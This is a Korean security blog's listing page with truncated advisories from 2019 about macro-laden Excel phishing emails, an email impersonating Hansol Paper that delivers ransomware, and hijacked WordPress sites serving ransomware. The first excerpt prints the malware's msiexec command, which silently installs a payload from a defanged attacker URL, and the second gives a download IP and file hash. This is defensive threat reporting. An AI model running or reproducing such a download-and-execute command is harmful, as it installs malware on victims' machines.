악성코드 유포

보안분석 : 엑셀(xls) 파일을 포함한 악성메일 유포 주의 (2019.05.08)

발신자 : paraic.hickey@dunbarlunn.com 외 다수 제목 : 서류 첨부파일명 : 1333327437141.xls (숫자 변경) 해당 메일은 본문내용 없이 '삼성 갤럭시 스마트폰에서 보냈습니다.'라는 문구와 숫자로 된 엑셀파일이 첨부되어 있습니다. 첨부된 엑셀 파일을 실행시키면 엑셀창이 뜨면서 '콘텐츠 사용' 이라는 보안경고 창이 활성화 되고 매크로 사용을 유도 하고 있습니다. 보안 경고를 무시하고 '콘텐츠 사용'을 누를경우 매크로를 수행해 외부로 부터 악성코드가 다운로드 됩니다. "msiexec.exe" with commandline "RESTART=AUTO /i hxxp://velquene.net/mshost1 /q ADRESS='%TMP%'" 현재 다수의 백신에서 미탐지 중이며, ..
Code::보안이슈 2019.05.08

보안분석 : 한솔제지(주) 사칭한 악성 메일 유포 주의 (2019.03.27)

최근 한솔제지를 사칭한 신종 랜섬웨어가 유포되고 있는 정황이 확인 되었습니다. 발신자 : penny@amerathon.com 외 다수 제목 : 한솔제지(주) 발주서 송부 첨부파일명 : 구매오더4500286249.xls 파일해시값 dccf4808f742270c24b709f8813d02e2d39a645bb852306e9ef5eae0bd52554e 메일에는 구매오더4500286249.xls 첨부파일이 포함되어 있습니다. 해당 파일을 실행시킬 경우 악성매크로 허용을 유도 하고 있으며, 매크로 실행시 202.168.154.158 접속후 임시폴더에 lib1 이라는 악성파일을 다운로드 받습니다. 해당파일은 Microsoft Installer 형태를 가지고 있으며, 윈도우 정상 인스톨러 msiexec.exe를 통해 해..
Code::보안이슈 2019.03.27

보안분석 : 탈취된 홈페이지를 통한 악성코드 유포 정보 (2019.02.11)

공격자는 홈페이지를 탈취하여 웹페이지를 삽입하고, 자신이 업로드한 파일을 다운로드 받을수 있도록 설정을 해두었습니다. 발견된 사이트들의 특징을 보면 대부분 워드프레스를 사용하고 있는것으로 확인이 됩니다. 삽입된 웹페이지는 모두 비슷한 형태로 구성되어 있으며, 다운로드 링크 클릭시 악성코드 유포지로 설정된 URL로 접속하여 정상파일로 위장한 랜섬웨어를 다운로드 받도록 설정되어 있습니다. 웹페이지 내부에는 특정 스크립트를 삽입하여 한번 접속한 웹 페이지는 사용할 수 없도록 설정되어 있으며 재접속시 정상페이지가 나타나도록 설정이 되어 있습니다. 해당 페이지는 동일한 사이트를 다시 재접속한 화면 입니다. 페이지를 보시면 정상적인 페이지로 보이고 다운로드 링크는 사라진것을 확인할 수 있습니다. 현재 악성코드 유포..
Code::보안이슈 2019.02.11
1
더보기
반응형

티스토리툴바